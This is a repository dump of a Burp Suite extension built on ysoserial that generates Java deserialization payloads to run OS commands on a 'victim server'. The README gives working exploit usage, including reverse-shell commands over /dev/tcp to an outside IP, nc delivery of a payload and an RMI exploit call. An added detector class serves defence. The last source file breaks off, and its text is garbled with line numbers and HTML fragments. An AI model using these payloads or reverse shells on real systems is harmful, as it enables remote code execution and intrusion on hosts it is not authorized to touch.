This extension generates various Java serialized payloads designed to execute
OS commands. There are three ways to use the extension:

1. Generate a payload from the Java Serialized Payloads Tab. You can then copy and paste
   it into other tabs in Burp.

2. Generate a payload from the Java Serialized Payloads Tab. In another tab you can select
   the text you want to replace and right click. You have three encoding
   options:

   Raw - This will replace your selected text with a raw unencoded
   version of the payload.

   B64 - This will replace your selected text with a Base64 encoded
   version.

   URLEnc - This will replace your selected text with a URL-encoded and
   base64 encoded payload.

3. You can use inline commands to replace your text with a payload that
   contains your command. For example you can enter text in Repeater like:

   $(CC1|ping -c1 8.8.8.8)

   Select the above text and right click any of the Java Serialized Payload
   Options and it will replace your command with a payload containing that
   command. The first parameter before the pipe in the above statement is the
   version of the exploit. You can enter any of the following:

   CC1 or CollectionCommons1
   CC2 or CollectionCommons2
   GV1 or Groovy1
   SP1 or Spring1

   The second parameter is the OS command you wish to run.

--------------------------------------------------------------------------------
/BappManifest.bmf:
--------------------------------------------------------------------------------
Uuid: bc737909a5d742eab91544705c14d34f
ExtensionType: 1
Name: Java Serialized Payloads
RepoName: java-serialized-payloads
ScreenVersion: 0.0.2a
SerialVersion: 2
MinPlatformVersion: 0
ProOnly: False
Author: Josh Summitt
ShortDescription: Generates Java serialized payloads to execute OS commands.
EntryPoint: ysoserial/target/ysoserial-0.0.2-SNAPSHOT-all.jar
BuildCommand: cd ysoserial && mvn package -DskipTests=true -Dmaven.javadoc.skip=true -B
SupportedProducts: Pro, Community

--------------------------------------------------------------------------------
/Payload Generator.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PortSwigger/java-serialized-payloads/0c7dd8cf7ebd5d2f17e0d18e7a26199f0edbd9ed/Payload Generator.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# burp-ysoserial - with complex command injection support

Download the jar file here: [ysoserial.jar](https://github.com/summitt/burp-ysoserial/releases)

There are 3 ways to run this [Burp](https://portswigger.net/) extension.

1. Generate a payload from the Java Serialized Payloads Tab. You can then copy and paste it into other tabs in [Burp](https://portswigger.net/). (Not ideal)
1. Generate a payload from the Java Serialized Payloads Tab. In another tab you can select the text you want to replace and right click. You have 3 options to replace.
    1. Raw - This will replace your selected text with an unencoded version of the payload. This is raw binary/hex.
    1. B64 - This will replace your selected text with a base64 encoded version.
    1. URLEnc - This will replace your selected text with a URL encoded and base64 encoded payload. Ideal for web type applications.
1. You can use inline commands to replace your text with a payload that contains your command. For example you can enter text in Repeater like:

```$(CC1|ping -c1 8.8.8.8)```

Select the above text and right click any of the Java Serialized Payload Options and it will replace your command with a payload containing that command.

The first parameter before the pipe in the above statement is the version of the exploit. You can enter any of the following:
- CC1 or CollectionCommons1
- CC2 or CollectionCommons2
- GV1 or Groovy1
- SP1 or Spring1

The second parameter is obviously the OS command you wish to run.

## Complex Commands (i.e. pipes and I/O redirection)
Note that ysoserial in this extension has been updated to accept more complicated commands than the original. For instance, commands like the following would fail to execute on the victim server in the original ysoserial application.

```echo test > /tmp/text.txt```
or
```bash -c "echo test > /tmp/text.txt"```

This is because, to run complex commands that pipe one command into another, Java needs the arguments as a String array. This version of ysoserial has been modified to use a delimiter of ",," to separate your arguments into the String array. Here is an example of running a more complicated command using this method to get a reverse shell:

```/bin/bash,,-c,,bash -i >& /dev/tcp/X.X.X.X/9997 0>&1```

The above text will be split into a String array that Java can run on the victim server. :) The resulting Java code would look like:
```Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", "bash -i >& /dev/tcp/X.X.X.X/9997 0>&1"});```

## Examples
### Example 1 - Replace selected text with a pre-generated payload
1. First, generate a payload.

2. Go to Repeater and select the text you want to replace.
3. Right click and select a payload option.


### Example 2 - Use an inline command
1. In [Burp](https://portswigger.net/) Repeater replace your parameter with the following code:

```$(CC1|ping -c1 8.8.8.8)```

2. Select the above text. Right click in Repeater and select the payload type.


### Example 3 - Complex commands
1. In Repeater replace your parameter with the following command:

```$(CC1|/bin/bash,,-c,,bash -i >& /dev/tcp/192.168.1.223/9997 0>&1)```

2. Select it and select the payload you want to generate.

--------------------------------------------------------------------------------
/complex command.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PortSwigger/java-serialized-payloads/0c7dd8cf7ebd5d2f17e0d18e7a26199f0edbd9ed/complex command.png
--------------------------------------------------------------------------------
/inline complex command.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PortSwigger/java-serialized-payloads/0c7dd8cf7ebd5d2f17e0d18e7a26199f0edbd9ed/inline complex command.png
--------------------------------------------------------------------------------
/inline-command.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PortSwigger/java-serialized-payloads/0c7dd8cf7ebd5d2f17e0d18e7a26199f0edbd9ed/inline-command.png
--------------------------------------------------------------------------------
/replace with generated.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PortSwigger/java-serialized-payloads/0c7dd8cf7ebd5d2f17e0d18e7a26199f0edbd9ed/replace with generated.png
--------------------------------------------------------------------------------
/ysoserial/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PortSwigger/java-serialized-payloads/0c7dd8cf7ebd5d2f17e0d18e7a26199f0edbd9ed/ysoserial/.DS_Store
--------------------------------------------------------------------------------
/ysoserial/.gitignore:
--------------------------------------------------------------------------------
/target
.classpath
.project
.settings/
pwntest
/bin/

--------------------------------------------------------------------------------
/ysoserial/.travis.yml:
--------------------------------------------------------------------------------
language: java
jdk:
- oraclejdk8
- oraclejdk7
- openjdk7
- openjdk6
--------------------------------------------------------------------------------
/ysoserial/DISCLAIMER.txt:
--------------------------------------------------------------------------------
DISCLAIMER

This software has been created purely for the purposes of academic research and
for the development of effective defensive techniques, and is not intended to be
used to attack systems except where explicitly authorized. Project maintainers
are not responsible or liable for misuse of the software. Use responsibly.
--------------------------------------------------------------------------------
/ysoserial/LICENSE.txt:
--------------------------------------------------------------------------------
Copyright (c) 2013 Chris Frohoff

MIT License

Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:

The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
--------------------------------------------------------------------------------
/ysoserial/README.md:
--------------------------------------------------------------------------------

# ysoserial

A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.


## Description

Released as part of AppSecCali 2015 Talk ["Marshalling Pickles: how deserializing objects will ruin your day"](http://frohoff.github.io/appseccali-marshalling-pickles/)

__ysoserial__ is a collection of utilities and property-oriented programming "gadget chains" discovered in common Java
libraries that can, under the right conditions, exploit Java applications performing __unsafe deserialization__ of objects.
The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then
serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes
this data, the chain will automatically be invoked and cause the command to be executed on the application host.

It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having
gadgets on the classpath.

## Disclaimer

This software has been created purely for the purposes of academic research and
for the development of effective defensive techniques, and is not intended to be
used to attack systems except where explicitly authorized. Project maintainers
are not responsible or liable for misuse of the software. Use responsibly.

## Usage

```shell
$ java -jar ysoserial-0.0.1-all.jar
Y SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'
Available payload types:
CommonsCollections1
CommonsCollections2
Groovy1
Spring1
```

## Examples

```shell
$ java -jar ysoserial-0.0.1-all.jar CommonsCollections1 calc.exe | xxd
0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat
...
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76 vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000 erride..........
0000570: 0078 7071 007e 003a .xpq.~.:

$ java -jar ysoserial-0.0.1-all.jar Groovy1 calc.exe > groovypayload.bin
$ nc 10.10.10.10 < groovypayload.bin

$ java -cp ysoserial-0.0.1-all.jar ysoserial.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
```
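
From the defender's side, the `aced 0005` bytes at the start of the xxd dump above are the Java serialization stream magic and version, and they survive each of the Burp extension's three encodings in a recognisable form (Base64 turns them into the `rO0AB` prefix). The following added Java example, which is not part of ysoserial or the extension, checks a parameter value in raw, Base64 and URL-encoded Base64 form and extracts the first class descriptor name for logging; `SerializedStreamDetector` and its sample stream are constructed for this illustration and check only the header, not any gadget chain.

```java
import java.net.URLDecoder;
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import java.util.Base64;

/**
 * Constructed defender-side example, not part of ysoserial or the Burp extension.
 * Recognises a Java serialization stream in a parameter value in the three forms the
 * extension produces (raw, Base64, URL-encoded Base64) and reports the first class
 * descriptor name, which is what a log line or WAF rule would want to record.
 */
public class SerializedStreamDetector {

    /** Which encoding matched and the first class name found in the stream. */
    public static final class Hit {
        public final String encoding;
        public final String firstClass;
        Hit(String encoding, String firstClass) { this.encoding = encoding; this.firstClass = firstClass; }
        @Override public String toString() { return encoding + " -> " + firstClass; }
    }

    /**
     * Stream layout: 0xACED (STREAM_MAGIC), 0x0005 (STREAM_VERSION), 0x73 (TC_OBJECT),
     * 0x72 (TC_CLASSDESC), then a 2-byte big-endian length and the class name.
     * Returns null when the bytes do not start with that header.
     */
    static String firstClassName(byte[] d) {
        if (d.length < 8 || (d[0] & 0xff) != 0xac || (d[1] & 0xff) != 0xed
                || d[2] != 0x00 || d[3] != 0x05 || d[4] != 0x73 || d[5] != 0x72) {
            return null;
        }
        int len = ((d[6] & 0xff) << 8) | (d[7] & 0xff);
        if (d.length < 8 + len) return null;
        // Names are modified UTF-8; for the ASCII class names seen in practice plain UTF-8 is identical.
        return new String(d, 8, len, StandardCharsets.UTF_8);
    }

    static byte[] tryBase64(String s) {
        try { return Base64.getDecoder().decode(s.trim()); }
        catch (IllegalArgumentException e) { return null; }   // not valid Base64
    }

    static String tryUrlDecode(String s) {
        try { return URLDecoder.decode(s, StandardCharsets.UTF_8.name()); }
        catch (Exception e) { return null; }                  // malformed %xx escape
    }

    /** Try raw first, then Base64, then URL-decoded Base64; null when nothing matches. */
    public static Hit detect(byte[] body) {
        String cls = firstClassName(body);
        if (cls != null) return new Hit("raw", cls);
        // ISO-8859-1 maps every byte to one char, so this decoding never throws.
        String text = new String(body, StandardCharsets.ISO_8859_1);
        byte[] b64 = tryBase64(text);
        if (b64 != null && (cls = firstClassName(b64)) != null) return new Hit("b64", cls);
        String decoded = tryUrlDecode(text);
        byte[] urlB64 = decoded == null ? null : tryBase64(decoded);
        if (urlB64 != null && (cls = firstClassName(urlB64)) != null) return new Hit("urlenc+b64", cls);
        return null;
    }

    /** Constructed sample: the stream header and one class descriptor name only, no gadget chain. */
    static byte[] sampleStream(String className) {
        byte[] name = className.getBytes(StandardCharsets.UTF_8);
        byte[] out = new byte[8 + name.length];
        out[0] = (byte) 0xac; out[1] = (byte) 0xed; out[2] = 0x00; out[3] = 0x05;
        out[4] = 0x73; out[5] = 0x72;
        out[6] = (byte) (name.length >> 8); out[7] = (byte) name.length;
        System.arraycopy(name, 0, out, 8, name.length);
        return out;
    }

    public static void main(String[] args) throws Exception {
        byte[] raw = sampleStream("sun.reflect.annotation.AnnotationInvocationHandler");
        String b64 = Base64.getEncoder().encodeToString(raw);
        String urlEnc = URLEncoder.encode(b64, StandardCharsets.UTF_8.name());
        System.out.println(detect(raw));
        System.out.println(detect(b64.getBytes(StandardCharsets.ISO_8859_1)));
        System.out.println(detect(urlEnc.getBytes(StandardCharsets.ISO_8859_1)));
        System.out.println(detect("cmd=ls".getBytes(StandardCharsets.ISO_8859_1)));  // no stream present
    }
}
```

A real deployment would run `detect` over every parameter and body, and alert or block when the class name is one of the gadget entry points the payload types above rely on; the header check alone is cheap enough to run inline.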

## Installation

1. Download the latest jar from the "releases" section.

## Code Status

[Build status on Travis CI](https://travis-ci.org/frohoff/ysoserial)

## Contributing

1. Fork it
2. Create your feature branch (`git checkout -b my-new-feature`)
3. Commit your changes (`git commit -am 'Add some feature'`)
4. Push to the branch (`git push origin my-new-feature`)
5. Create new Pull Request

--------------------------------------------------------------------------------
/ysoserial/pom.xml:
--------------------------------------------------------------------------------
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>

  <groupId>ysoserial</groupId>
  <artifactId>ysoserial</artifactId>
  <version>0.0.2-SNAPSHOT</version>
  <packaging>jar</packaging>

  <name>ysoserial</name>
  <url>http://maven.apache.org</url>

  <properties>
    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
  </properties>

  <build>
    <sourceDirectory>src</sourceDirectory>

    <plugins>
      <plugin>
        <groupId>org.apache.maven.plugins</groupId>
        <artifactId>maven-compiler-plugin</artifactId>
        <version>3.2</version>
        <configuration>
          <source>1.8</source>
          <target>1.8</target>
        </configuration>
      </plugin>
      <plugin>
        <artifactId>maven-assembly-plugin</artifactId>
        <configuration>
          <finalName>${project.artifactId}-${project.version}-all</finalName>
          <appendAssemblyId>false</appendAssemblyId>
          <archive>
            <manifest>
              <mainClass>ysoserial.GeneratePayload</mainClass>
            </manifest>
          </archive>
          <descriptorRefs>
            <descriptorRef>jar-with-dependencies</descriptorRef>
          </descriptorRefs>
        </configuration>
        <executions>
          <execution>
            <id>make-assembly</id>
            <phase>package</phase>
            <goals>
              <goal>single</goal>
            </goals>
          </execution>
        </executions>
      </plugin>
    </plugins>
  </build>

  <dependencies>

    <dependency>
      <groupId>junit</groupId>
      <artifactId>junit</artifactId>
      <version>4.12</version>
      <scope>test</scope>
    </dependency>
    <dependency>
      <groupId>org.mockito</groupId>
      <artifactId>mockito-core</artifactId>
      <version>1.10.19</version>
      <scope>test</scope>
    </dependency>
    <dependency>
      <groupId>com.github.stefanbirkner</groupId>
      <artifactId>system-rules</artifactId>
      <version>1.8.0</version>
      <scope>test</scope>
    </dependency>

    <dependency>
      <groupId>org.reflections</groupId>
      <artifactId>reflections</artifactId>
      <version>0.9.9</version>
    </dependency>
    <dependency>
      <groupId>org.jboss.shrinkwrap.resolver</groupId>
      <artifactId>shrinkwrap-resolver-depchain</artifactId>
      <version>2.1.1</version>
      <type>pom</type>
    </dependency>
    <dependency>
      <groupId>org.javassist</groupId>
      <artifactId>javassist</artifactId>
      <version>3.19.0-GA</version>
    </dependency>
    <dependency>
      <groupId>net.portswigger.burp.extender</groupId>
      <artifactId>burp-extender-api</artifactId>
      <version>1.7.13</version>
    </dependency>

    <dependency>
      <groupId>commons-collections</groupId>
      <artifactId>commons-collections</artifactId>
      <version>3.1</version>
    </dependency>
    <dependency>
      <groupId>org.apache.commons</groupId>
      <artifactId>commons-collections4</artifactId>
      <version>4.0</version>
    </dependency>
    <dependency>
      <groupId>org.apache.commons</groupId>
      <artifactId>commons-lang3</artifactId>
      <version>3.1</version>
    </dependency>
    <dependency>
      <groupId>org.codehaus.groovy</groupId>
      <artifactId>groovy</artifactId>
      <version>2.3.9</version>
    </dependency>
    <dependency>
      <groupId>org.springframework</groupId>
      <artifactId>spring-core</artifactId>
      <version>4.1.4.RELEASE</version>
    </dependency>
    <dependency>
      <groupId>org.springframework</groupId>
      <artifactId>spring-beans</artifactId>
      <version>4.1.4.RELEASE</version>
    </dependency>
  </dependencies>
</project>

--------------------------------------------------------------------------------
/ysoserial/src/burp/BurpExtender.java:
--------------------------------------------------------------------------------
package burp;

import java.awt.Component;
import java.util.ArrayList;
import java.util.List;

import javax.swing.JMenuItem;
import javax.swing.SwingUtilities;

import com.josh.ActionJackson;
import com.josh.ysoserialFrame;

/** Burp entry point: registers the "Java Serialized Payloads" tab and the three context-menu replacement options. */
public class BurpExtender implements IBurpExtender, ITab, IContextMenuFactory
{
    private ysoserialFrame exFrame;
    private IBurpExtenderCallbacks cb;
    private IExtensionHelpers helpers;

    @Override
    public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks)
    {
        cb = callbacks;
        helpers = cb.getHelpers();
        cb.setExtensionName("Java Serialized Payloads");
        cb.registerContextMenuFactory(this);
        // Build the Swing tab on the event dispatch thread, then hand it to Burp.
        SwingUtilities.invokeLater(new Runnable(){
            @Override
            public void run() {
                exFrame = new ysoserialFrame();
                cb.customizeUiComponent(exFrame);
                cb.addSuiteTab(BurpExtender.this);
            }
        });
    }

    @Override
    public String getTabCaption(){
        return "Java Serialized Payloads";
    }

    @Override
    public Component getUiComponent() {
        return exFrame;
    }

    // The menu is only offered inside a message editor, where a text selection can be replaced.
    @Override
    public List<JMenuItem> createMenuItems(IContextMenuInvocation inv) {
        byte ctx = inv.getInvocationContext();
        if( ctx == IContextMenuInvocation.CONTEXT_MESSAGE_EDITOR_REQUEST
                || ctx == IContextMenuInvocation.CONTEXT_MESSAGE_EDITOR_RESPONSE){
            JMenuItem raw = new JMenuItem("Java Serialized Payload (Raw)");
            raw.addActionListener(new ActionJackson(inv, exFrame, "raw"));
            JMenuItem b64 = new JMenuItem("Java Serialized Payload (b64)");
            b64.addActionListener(new ActionJackson(inv, exFrame, "b64"));
            JMenuItem eurl = new JMenuItem("Java Serialized Payload (URLEnc)");
            eurl.addActionListener(new ActionJackson(inv, exFrame, "eurl"));
            List<JMenuItem> stuff = new ArrayList<JMenuItem>();
            stuff.add(raw);
            stuff.add(b64);
            stuff.add(eurl);
            return stuff;
        }else{
            return null;
        }
    }

}

--------------------------------------------------------------------------------
/ysoserial/src/com/josh/ActionJackson.java:
--------------------------------------------------------------------------------
package com.josh;

import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.io.UnsupportedEncodingException;
import java.nio.charset.StandardCharsets;
import java.util.Arrays;

import burp.IContextMenuInvocation;
import burp.IHttpRequestResponse;

/**
 * Context-menu action: if the selection is an inline "$(TYPE|cmd)" command it is
 * generated first, then the selection is replaced with the payload in the chosen
 * encoding ("raw" as bytes, "b64" / "eurl" as text).
 */
public class ActionJackson implements ActionListener{
    private IContextMenuInvocation inv;
    private ysoserialFrame ysoframe;
    private String opt;

    public ActionJackson(IContextMenuInvocation inv, ysoserialFrame ysoframe, String opt){
        this.inv = inv;
        this.ysoframe = ysoframe;
        this.opt = opt;
    }

    public void actionPerformed(ActionEvent e) {
        try {
            updateIfCMD();
            replace(ysoframe.getPayloadText(this.opt));
        } catch (UnsupportedEncodingException e1) {
            e1.printStackTrace();
        }
    }

    private boolean isRequest(){
        byte ctx = inv.getInvocationContext();
        return ctx == IContextMenuInvocation.CONTEXT_MESSAGE_EDITOR_REQUEST
                || ctx == IContextMenuInvocation.CONTEXT_MESSAGE_VIEWER_REQUEST;
    }

    // ISO-8859-1 maps every byte to exactly one char, so the message round-trips
    // through String without corrupting non-ASCII bytes (the default charset would).
    private String getMessage(IHttpRequestResponse o){
        return new String(getMsgBytes(o), StandardCharsets.ISO_8859_1);
    }

    private byte[] getMsgBytes(IHttpRequestResponse o){
        return isRequest()? o.getRequest(): o.getResponse();
    }

    private void setMessage(IHttpRequestResponse o, String update){
        setMsgBytes(o, update.getBytes(StandardCharsets.ISO_8859_1));
    }

    private void setMsgBytes(IHttpRequestResponse o, byte [] update){
        if(isRequest()){
            o.setRequest(update);
        }else{
            o.setResponse(update);
        }
    }

    /* Earlier version of replace(), left commented out in the original source.
    private void replace-bk(Object replace){
        if(replace == null){
            return;
        }

        System.out.println(replace.getClass().getName());
        if(replace.getClass().getName().equals("java.lang.String")){
            int start = inv.getSelectionBounds()[0];
            int stop = inv.getSelectionBounds()[1];
            for(IHttpRequestResponse o : inv.getSelectedMessages()){
                String all = getMessage(o);
                String Selected = all.substring(start, stop);
                if(Selected.startsWith("$(")){
                    String cmd = Selected.substring(2, Selected.length()-1);

                    String type = cmd.substring(0, cmd.indexOf("|"));
                    String oscmd = cmd.substring(cmd.indexOf("|"));
                    System.out.println("Running with the following Library: " + type);
                    System.out.println("Running with the following Command: " + oscmd);
                    // this will update the other getters and setters used later
                    this.ysoframe.executeYsoSerial(type, oscmd);
                }
                String begin = all.substring(0, start);
                String end = all.substring(stop);
                all = begin + replace + end;
                setMessage(o, all);
                break;
            }
        }
    }*/

    // If the selected text is "$(TYPE|command)", expand the short alias and generate
    // that payload now, so getPayloadText() below returns the freshly built one.
    private void updateIfCMD(){
        int start = inv.getSelectionBounds()[0];
        int stop = inv.getSelectionBounds()[1];
        for(IHttpRequestResponse o : inv.getSelectedMessages()){
            String all = getMessage(o);
            String Selected = all.substring(start, stop);
            if(Selected.startsWith("$(")){
                String cmd = Selected.substring(2, Selected.length()-1);
                // only the first pipe separates the type; later pipes belong to the OS command
                String type = cmd.substring(0, cmd.indexOf("|"));
                String oscmd = cmd.substring(cmd.indexOf("|")+1);
                System.out.println("Running with the following Library: " + type);
                System.out.println("Running with the following Command: " + oscmd);
                if(type.equals("CC1"))
                    type = "CommonsCollections1";
                else if(type.equals("CC2"))
                    type = "CommonsCollections2";
                else if(type.equals("GV1"))
                    type = "Groovy1";
                else if (type.equals("SP1"))
                    type = "Spring1";
                // this will update the other getters and setters used later
                this.ysoframe.executeYsoSerial(type, oscmd);
            }
            break;
        }
    }

    // Splice the payload over the selection: text payloads (b64, eurl) via String,
    // the raw payload via byte arrays so binary content is not altered.
    private void replace(Object replace){
        if(replace == null)
            return;
        int start = inv.getSelectionBounds()[0];
        int stop = inv.getSelectionBounds()[1];
        if(replace instanceof String){
            for(IHttpRequestResponse o : inv.getSelectedMessages()){
                String all = getMessage(o);
                String begin = all.substring(0, start);
                String end = all.substring(stop);
                all = begin + replace + end;
                setMessage(o, all);
                break;
            }
        }else{
            for(IHttpRequestResponse o : inv.getSelectedMessages()){
                byte[] all = getMsgBytes(o);
                byte[] begin = Arrays.copyOfRange(all, 0, start);
                byte[] end = Arrays.copyOfRange(all, stop, all.length);
                byte [] r = (byte[])replace;
                byte [] out = new byte[begin.length + end.length + r.length];
                System.arraycopy(begin, 0, out, 0, begin.length);
                System.arraycopy(r, 0, out, begin.length, r.length);
                System.arraycopy(end, 0, out, r.length+begin.length, end.length);
                setMsgBytes(o,out);
                break;
            }
        }
    }

}

--------------------------------------------------------------------------------
/ysoserial/src/com/josh/MainMan.java:
--------------------------------------------------------------------------------
package com.josh;

import java.awt.EventQueue;

import javax.swing.JFrame;
import javax.swing.UIManager;
import javax.swing.UIManager.LookAndFeelInfo;
import javax.swing.border.EmptyBorder;

/** Stand-alone launcher that shows the ysoserialFrame panel outside Burp. */
public class MainMan extends JFrame{
    private ysoserialFrame contentPane;

    public static void main(String[] args) {
        try {
            for (LookAndFeelInfo info : UIManager.getInstalledLookAndFeels()) {
                if ("Nimbus".equals(info.getName())) {
                    UIManager.setLookAndFeel(info.getClassName());
                    break;
                }
            }
        }
        catch (Exception e) {
            // DO Nothing
        }

        EventQueue.invokeLater(new Runnable() {
            public void run() {
                try {
                    MainMan frame = new MainMan();
                    frame.setVisible(true);
                } catch (Exception e) {
                    e.printStackTrace();
                }
            }
        });
    }

    public MainMan() {
        setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
        setBounds(100, 100, 450, 300);
        contentPane = new ysoserialFrame();
        contentPane.setBorder(new EmptyBorder(5, 5, 5, 5));
        //contentPane.setLayout(new BorderLayout(0, 0));
        setContentPane(contentPane);
    }

}

--------------------------------------------------------------------------------
/ysoserial/src/com/josh/ysoserialFrame.java:
--------------------------------------------------------------------------------
package com.josh;

import java.awt.BorderLayout;
import java.awt.EventQueue;

import javax.swing.JFrame;
import javax.swing.JPanel;
import javax.swing.border.EmptyBorder;
import javax.swing.ButtonGroup;
import javax.swing.SpringLayout;
import javax.swing.JSplitPane;
import javax.swing.JRadioButton;
import javax.swing.JTextField;
import javax.swing.JTextPane;
import javax.swing.JLabel;
import javax.swing.JButton;
import javax.swing.SwingConstants;

import ysoserial.GeneratePayload;
import ysoserial.payloads.ObjectPayload;

import java.awt.event.ActionListener;
import java.awt.event.ActionEvent;
import java.awt.event.MouseAdapter;
import java.awt.event.MouseEvent;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.io.UnsupportedEncodingException;
import java.net.URLEncoder;
import java.util.Base64;

import javax.swing.JTextArea;
import javax.swing.JScrollPane;
import javax.swing.ScrollPaneConstants;

import java.awt.FlowLayout;

import javax.swing.BoxLayout;

/** The "Java Serialized Payloads" tab: payload type radio buttons, an OS command field and the output pane. */
public class ysoserialFrame extends JPanel {

    private JPanel contentPane;
    private JTextField cmdtxt;
    private JTextPane outtxt;
    private JRadioButton cc1rdo;
    private JRadioButton cc2rdo;
    private JRadioButton grvrdo;
    private JRadioButton spgrdo;
    private ButtonGroup group;
    private JRadioButton stsrdo;
    private JRadioButton insrdo;
    private String payloadStr;
    private byte[] rawPayload;

    /**
     * Launch the application.
     */
    public static void main(String[] args) {
        EventQueue.invokeLater(new Runnable() {
            public void run() {
                try {
                    ysoserialFrame frame = new ysoserialFrame();
                    frame.setVisible(true);
                } catch (Exception e) {
                    e.printStackTrace();
                }
            }
        });
    }

    /**
     * Create the frame.
     */
    public ysoserialFrame() {

        contentPane = this;
        setLayout(null);

        cmdtxt = new JTextField();
        cmdtxt.setBounds(125, 58, 217, 29);
        contentPane.add(cmdtxt);
        cmdtxt.setColumns(10);

        JLabel lblOsCmd = new JLabel("OS CMD:");
        lblOsCmd.setBounds(58, 65, 77, 14);
        contentPane.add(lblOsCmd);

        JButton genbtn = new JButton("Generate");
        genbtn.addMouseListener(new MouseAdapter() {
            @Override
            public void mouseClicked(MouseEvent arg0) {
                // map the selected radio button to the ysoserial payload type name
                String payloadType = "CommonsCollections1";
                if(cc1rdo.isSelected())
                    payloadType = "CommonsCollections1";
                else if(cc2rdo.isSelected())
                    payloadType = "CommonsCollections2";
                else if(grvrdo.isSelected())
                    payloadType = "Groovy1";
                else if(spgrdo.isSelected())
                    payloadType = "Spring1";
                if(insrdo.isSelected()){
                    outtxt.setText(getInstructions());
                }else if(!stsrdo.isSelected())
                    outtxt.setText(executeYsoSerial(payloadType, cmdtxt.getText().trim()));
                else
                    outtxt.setText(strutsExploit(cmdtxt.getText().trim()));
            }
        });
        genbtn.addActionListener(new ActionListener() {
            public void actionPerformed(ActionEvent arg0) {
            }
        });
        genbtn.setBounds(352, 58, 130, 30);
        contentPane.add(genbtn);

        JScrollPane scrollPane = new JScrollPane();
        scrollPane.setVerticalScrollBarPolicy(ScrollPaneConstants.VERTICAL_SCROLLBAR_ALWAYS);
        scrollPane.setBounds(33, 98, 662, 481);
        add(scrollPane);

        outtxt = new JTextPane();
        //outtxt.setLineWrap(true);
        outtxt.putClientProperty("html.disable", null);
        outtxt.setContentType("text/html");
        scrollPane.setViewportView(outtxt);

        JPanel panel = new JPanel();
        panel.setBounds(58, 11, 735, 43);
        add(panel);
        panel.setLayout(new BoxLayout(panel, BoxLayout.X_AXIS));

        cc1rdo = new JRadioButton("CC1");
        panel.add(cc1rdo);
        cc1rdo.setSelected(true);
        cc1rdo.setToolTipText("CommonsCollections1");

        cc2rdo = new JRadioButton("CC2");
        panel.add(cc2rdo);
        cc2rdo.setToolTipText("Commons Collections2");

        grvrdo = new JRadioButton("Groovy1");
        panel.add(grvrdo);

        spgrdo = new JRadioButton("Spring1");
        panel.add(spgrdo);
        stsrdo = new JRadioButton("Struts2");
        panel.add(stsrdo);
        insrdo = new JRadioButton("Instructions");
        panel.add(insrdo);
        group = new ButtonGroup();
        group.add(cc1rdo);
        group.add(cc2rdo);
        group.add(grvrdo);
        group.add(spgrdo);
        group.add(stsrdo);
        group.add(insrdo);

    }
163 | private String div(String text, String cls){
164 | return "
Generate a payload from the menu above. You can then copy and paste it into other tabs in burp.
"
185 | + "
Generate a payload from the menu above. In another tab you can select the text you want to replace and right click. You have 3 options to replace."
186 | + ""
187 | + "
Raw - This will replace your selected text with an unencoded version of the payload. This is raw binary/hex.
"
188 | + "
B64 - This payload will replace your selected text with a base64 encoded version.
"
189 | + "
URLEnc - This will replace your selected text with a URL encoded and base64 encoded payload. Ideal for web type applications
"
190 | + ""
191 | + "
You can use inline commands to replace your text with a payload that contains your command. For example you can enter text in repeater like: "
192 | + div("$(CC1|ping -c1 8.8.8.8)","code2")
193 | + "Select the above text and right click any of the Java Serialized Payload Options and it will replace your command with a payload containing that command."
194 | + "
"
195 | + "Note ysoserial in this extension has been updated to accept more complicated commands that in the original. "
196 | + "For instance commands the following command would fail to execute on the victim server:"
197 | + div("echo test > /tmp/text.txt","code2") + "or" + div("bash -c \"echo test > /tmp/text.txt\"","code2") +" "
198 | + "This is because to run complex command or pipe command into other commands in java the arguments needs to be a string Array."
199 | + " This has been modified in this version by using a delimter of \",,\". to seperate your arguments to the string array.